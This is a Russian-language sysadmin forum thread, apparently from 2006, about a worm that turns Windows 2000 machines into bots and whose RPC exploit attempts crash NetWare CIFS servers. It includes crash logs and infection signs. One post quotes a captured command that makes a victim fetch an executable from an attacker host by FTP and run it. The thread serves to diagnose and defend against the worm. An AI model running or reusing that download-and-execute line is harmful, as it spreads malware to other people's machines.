Позорище позорное - Netware падает от виндового вируса!

[Сергей Дубров]

Словили вчера в нашей сетке какого-то трояна, видимо из новых, потому что поиски по его симптомам в гугле и т.п. ничего не дают. Пока известно следующее: заражаются только машины с Win2000, ни одной машины с 98/XP/2003/NT в заразу не попало. При вторичном заражении (опишу ниже, что это такое) антивирусы со свежими обновлениями вскидываются и давят запускающиеся программы со случайными именами, но после этого машина перезагружается.

Механизм заражения точно пока неизвестен, но видно (пасли сниффером), что делается попытка сорвать стек и заставить выполнить атакуемую машину нечто вроде:

cmd /c echo open 111.222.333.444 28788 >x & echo user asn x >>x & echo bin >>x & echo get hqghumea.exe >> x & echo bye >>x & del x & ftp.exe -n -s: x & start hqghumea.exe

Если это удалось, то на атакуемой машине запускается ftp-клиент и забирает с машины 111.222.333.444 (атакующей), со случайного порта типа 28788 файлик вторичного заражения - hqghumea.exe - и запускает его. После этого атакуемая машина превращается в бота.

А самое неприятное для меня заключается в том, что описанная выше атака с 'cmd /c ...' роняет в абенд нетваревские сервера с CIFS-ом. Роняет в два приёма - сначала появляется единичка в угловых скобках (нефатальный абенд), а потом, видимо со следующей попытке, сервер просто перегружается. Вот такая вот эмуляция самбы у Новела - даже реакцию на вирусы сделали виндоподобную. Позор!

Выяснено, что падают сервера NW5.1 и NW6.0 (с распоследними SP). CIFS на NW6.5+SP5 держится.

[Dimerson]

Словили вчера в нашей сетке какого-то трояна, видимо из новых, потому что поиски по его симптомам в гугле и т.п. ничего не дают. Пока известно следующее: заражаются только машины с Win2000, ни одной машины с 98/XP/2003/NT в заразу не попало. При вторичном заражении (опишу ниже, что это такое) антивирусы со свежими обновлениями вскидываются и давят запускающиеся программы со случайными именами, но после этого машина перезагружается.

Механизм заражения точно пока неизвестен, но видно (пасли сниффером), что делается попытка сорвать стек и заставить выполнить атакуемую машину нечто вроде:

cmd /c echo open 111.222.333.444 28788 >x & echo user asn x >>x & echo bin >>x & echo get hqghumea.exe >> x & echo bye >>x & del x & ftp.exe -n -s: x & start hqghumea.exe

Если это удалось, то на атакуемой машине запускается ftp-клиент и забирает с машины 111.222.333.444 (атакующей), со случайного порта типа 28788 файлик вторичного заражения - hqghumea.exe - и запускает его. После этого атакуемая машина превращается в бота.

А самое неприятное для меня заключается в том, что описанная выше атака с 'cmd /c ...' роняет в абенд нетваревские сервера с CIFS-ом. Роняет в два приёма - сначала появляется единичка в угловых скобках (нефатальный абенд), а потом, видимо со следующей попытке, сервер просто перегружается. Вот такая вот эмуляция самбы у Новела - даже реакцию на вирусы сделали виндоподобную. Позор!

Выяснено, что падают сервера NW5.1 и NW6.0 (с распоследними SP). CIFS на NW6.5+SP5 держится.

намана. падает все что unsuppoted & dead ;o)

[Андрей Тр. aka RH]

Сергей, а что на эту тему пишется в ABEND.LOG ? про единичку в скобках. Просто у меня на одном из серверов только что случился такой вот нефатальный абенд. При этом на данном сервере абендов еще не было ни разу в жизни. Правда, это 6.5SP3, но с поднятым с CIFS. Вот верхушка моего :

Код: Выделить всё

Abend 1 on P00: Server-5.70.03-1937: CPU Hog Detected by Timer

Registers:
    CS = 0060 DS = 0068 ES = 0068 FS = 007B GS = 007B SS = 0068
    EAX = FCE17BBC EBX = 00000000 ECX = 4C9D1D50 EDX = 00000003
    ESI = 00000246 EDI = 68101160 EBP = 68101160 ESP = 575005C8
    EIP = 00000000 FLAGS = 00000046

Running process: Udp32778Thd8 Process
Thread Owned by NLM: XNFS.NLM


[Сергей Дубров]

Сергей, а что на эту тему пишется в ABEND.LOG ? про единичку в скобках. Просто у меня на одном из серверов только что случился такой вот нефатальный абенд. При этом на данном сервере абендов еще не было ни разу в жизни. Правда, это 6.5SP3, но с поднятым с CIFS. Вот верхушка моего :

Код: Выделить всё

Abend 1 on P00: Server-5.70.03-1937: CPU Hog Detected by Timer

Registers:
    CS = 0060 DS = 0068 ES = 0068 FS = 007B GS = 007B SS = 0068
    EAX = FCE17BBC EBX = 00000000 ECX = 4C9D1D50 EDX = 00000003
    ESI = 00000246 EDI = 68101160 EBP = 68101160 ESP = 575005C8
    EIP = 00000000 FLAGS = 00000046

Running process: Udp32778Thd8 Process
Thread Owned by NLM: XNFS.NLM


У меня это выглядит так:

Код: Выделить всё

Server ARC halted Tuesday, November 28, 2006  11:02:48.291 am
Abend 1 on P00: Server-5.00l: Page Fault Processor Exception (Error code 00000002)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
    EAX = 9CA5C37E EBX = 9CA5C28C ECX = 000000C3 EDX = 00000000
    ESI = 9CA81F91 EDI = 9CA5D000 EBP = 00000000 ESP = D0859D7C
    EIP = B49987C7 FLAGS = 00214003
    B49987C7 F3A5       REP MOVSD
    EIP in CIFS.NLM at code start +000007C7h
    Access Location: 0x9CA5D000

The violation occurred while processing the following instruction:
B49987C7 F3A5       REP MOVSD
B49987C9 2403           AND     AL,03
B49987CB 8AC8           MOV     CL,AL
B49987CD F3A4       REP MOVSB
B49987CF 8DBB24010000   LEA     EDI,[EBX+00000124]
B49987D5 8D4364         LEA     EAX,[EBX+64]
B49987D8 85ED           TEST    EBP,EBP
B49987DA 7427           JZ      B4998803
B49987DC 8B4C2430       MOV     ECX,[ESP+30]
B49987E0 85C9           TEST    ECX,ECX



Running process: Server 04 Process
Created by: NetWare Application
Thread Owned by NLM: SERVER.NLM
Stack pointer: D0859F88
OS Stack limit: D0852040
Scheduling priority: 67371008
Wait state: 50500F0  (Waiting for work)
Stack: --00000000  ?
       --9CA822A0  ?
       --00000000  ?
       --D0859DFC  ?
       --9CA5C220  ?
       B4998934  (CIFS.NLM|AUTHAllocInfo+8C)
       --9CA5C28C  ?


[Мещеряков Андрей]

-Не грузил CIFS и грузить не буду

[Музалёв Николай]

Дяденьки, дяденьки... а вирус, вирус то как? отловили?

[Сергей Дубров]

Дяденьки, дяденьки... а вирус, вирус то как? отловили?

Отловили, удавили - ключевое слово ninsvc - сервис-паразит. Кстати, заплата от этой дыры появилась у мелкомягких в сентябре с.г. А у Новела - нет до сих пор

http://www.sophos.com/security/analyses/w32akbotal.html

Один из признаков заражения этой дрянью - полностью переписанный файл %SystemRoot%\System32\drivers\etc\hosts - все известные автору антивирусные сайты, виндоусапдейт и т.п. резолвятся в 127.0.0.1

[Boris Morozov]

На нем же этот сервис не запускается. А разбираться с файлами дело антивирусов.

[Dimerson]

На нем же этот сервис не запускается. А разбираться с файлами дело антивирусов.

как сказать - если падает в корку сервис то это еще и дело писателей данного сервиса. Я помню вот во времена когда NW6 был еще supported - CIFS валился от сканирования его обычным GFI LanNetScan'ом (может тогда и не GFI он был но не суть). Следующим сервиспаком это вылечилось. Имхо проблема в том что продукт не поддержиается и это печально. Думаю Андрей Фисенко нас ничем не сможет утешить .... если апгрейт CLIB не спасет то увы ((

это Билл Гей придумал эту долбанную гонку вооружений - новая ОС каждый год ... я вот сейчас вывожу NW3.12 - мигрирую на SBS 66 / Ip Only.
Блин эта ос родилась во времена когда венда была еще 3.11 ...

Сердце кровью обливается - а что делать- на том же железе 65 в двойку шустрее.

[Сергей Дубров]

На нем же этот сервис не запускается. А разбираться с файлами дело антивирусов.

Заражённая венда, обнаружив новеловский CIFS в сети и, приняв его за "своего", пытается заразить эту имитацию M$-сервера тем же способом, которым заражаются обычные венды (дыра в RPC). В результате CIFS с грохотом падает и абендит NW-сервер с полной перезагрузкой. Полноценного заражения виндовым сервисом-паразитом (ninsvc), естественно, произойти не может, но от этого не легче - сервер-то падает, DoS в чистом виде.

Я помню вот во времена когда NW6 был еще supported - CIFS валился от сканирования его обычным GFI LanNetScan'ом

А я помню, как от сканирования этим же LANGuard-ом на Netware перекашивало арсксервовские NWAgent-ы (из версии 6.6), так, что они после этого переставали работать. На новой версии арксерва я это ещё не проверял.

[Boris Morozov]

или все-таки нет? Я так понимаю, мелкомягкие поправили у себя только в сентябре, в то время как у новелла этой дыры уже не было вообще. (Не говорим о неподдерживаемых продуктах). Я правильно понимаю ситуацию?

[Аркадий Глазырин]

я сейчас вывожу NW3.12 - мигрирую на SBS 66 / Ip Only.
Блин эта ос родилась во времена когда венда была еще 3.11 ...

Сердце кровью обливается - а что делать- на том же железе 65 в двойку шустрее.

Что есть SBS 66 / Ip Only?

Трассу 66 знаю. Регион 66 знаю.

SBS 66 не знаю.

[Dimerson]

я сейчас вывожу NW3.12 - мигрирую на SBS 66 / Ip Only.
Блин эта ос родилась во времена когда венда была еще 3.11 ...

Сердце кровью обливается - а что делать- на том же железе 65 в двойку шустрее.

Что есть SBS 66 / Ip Only?

Трассу 66 знаю. Регион 66 знаю.

SBS 66 не знаю.

Small Business Suite 6.6 про IP ONLY в контексте миграции 3.12-> 6.5 это понятно.

[Сергей Дубров]

или все-таки нет? Я так понимаю, мелкомягкие поправили у себя только в сентябре, в то время как у новелла этой дыры уже не было вообще. (Не говорим о неподдерживаемых продуктах). Я правильно понимаю ситуацию?

Дыра исправлена только на NW6.5. На 5.1/6.0 все последние обновления стоят, но CIFS продолжает абендить сервера. 5.1, вроде бы, ещё числится сапортед (6.0 - точно нет).